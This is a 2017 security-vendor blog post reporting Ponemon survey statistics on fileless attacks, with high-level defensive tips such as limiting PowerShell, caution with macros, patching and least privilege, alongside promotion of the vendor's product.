Stats & Trends
Jonathan Crowe
Nov 2017

Fileless Attack Techniques Used in Majority of Successful Hacks


According to a new study from the Ponemon Institute, 77 percent of successful compromises involved fileless techniques.

To discover how cyber attacks are evolving and how organizations are attempting to adapt, Barkly recently teamed up with the Ponemon Institute, who independently surveyed 665 IT security professionals responsible for managing and reducing their organization’s security risk.

According to the survey findings, seven out of 10 organizations have experienced a significant increase in endpoint security risk during the past 12 months. Corresponding with that increase is a rise in “fileless” attacks — attacks that avoid dropping malicious executable files in favor of using exploits, scripts, or otherwise legitimate system administration tools, instead. 

What constitutes a fileless attack?

A fileless attack is an attack that avoids downloading malicious executable files at one or multiple stages by using exploits, scripts, or legitimate system tools, instead.

Why attackers use fileless techniques

Rather than install malicious executable files that antivirus solutions can scan and block, the attacks that are most often compromising organizations are instead leveraging exploits designed to run malicious code or launching scripts directly from memory, infecting endpoints without leaving easily-discoverable artifacts behind.

Once an endpoint has been compromised, these attacks can also abuse legitimate system administration tools and processes to gain persistence, elevate privileges, and spread laterally across the network.

Survey responses estimated 29 percent of the attacks they faced during 2017 were fileless attacks, up from 20 percent the year before. They also project that proportion to continue to rise next year, with fileless attacks estimated to make up 35 percent of all attacks in 2018.


Why the uptick? In short, fileless attacks are working. According to the responses, 42% of companies experienced one or more fileless attacks that successfully compromised their data or IT infrastructure in 2017. In fact, over three-quarters of reported successful compromises involved fileless techniques. 


Result: Antivirus solutions are being replaced or supplemented 

The success of fileless attacks has further eroded organizations’ trust in their existing security solutions. Less than a third of respondents believe their antivirus (AV) can stop the threats they are seeing. As a result, the vast majority are investing in new technology.

4 out of 5 organizations replaced or augmented their existing antivirus solution in 2017.

Tweet this

One third of respondents reported they had replaced their AV with another vendor’s AV or a next-generation endpoint solution. Half of the organizations reported they had and kept their existing AV and added solutions with either additional protection or detection and response capabilities.

Despite the addition of new technologies, only 54 percent of survey respondents indicated they believed the attacks they’re seeing can be realistically stopped.

5 tips for mitigating the risk of fileless attacks

The good news is there are several practical things you can do now to reduce your organization's susceptibility to fileless attack techniques: 

  1. Block activity, not just file signatures: With no files to scan, detecting and blocking these attacks comes down to being able to identify malicious behaviors before damage is done. If you have the staff and resources to handle it, enabling and monitoring extended PowerShell logging can help you identify suspicious scripts. Alternatively, solutions like Barkly can help you proactively block malicious scripts automatically.  

  2. Beware macros: Warn users to be extremely wary of Microsoft Office documents that prompt them to enable macros (or "enable content"), and utilize endpoint protection that blocks malicious macros before they can execute. Speaking of Microsoft Office, make sure you've taken measures to block DDE attacks, too. 

  3. Disable system admin tools you don't use: The liability they present simply isn't worth it. First and foremost on the list is PowerShell. If disabling PowerShell isn't a realistic option, consider using Constrained Language Mode to limit PowerShell to basic functionality, which makes many fileless attack techniques unusable.

  4. Always be patching: And when you can't patch, isolate. 

  5. Practice the principle of least privilege: Ensure that user access and privileges are limited to the bare minimum they absolutely need. Microsoft's Just Enough Administration technology can help. 

Based on the Ponemon research, it's clear organizations can benefit from endpoint security solutions specifically designed to block fileless attacks, which are responsible for the majority of today’s successful compromises. To restore faith in endpoint security’s effectiveness, however, these new solutions need to address this crucial gap in protection without adding unnecessary complexity to endpoint management. 

Find out how we've built Barkly to do just that. See how it works.

Looking for more stats on fileless attacks and the current state of endpoint security? Download Ponemon's 2017 State of Endpoint Security Risk report.

Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.


Close the gaps in your security

Find out how Barkly blocks attacks other solutions miss.

See a demo


Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.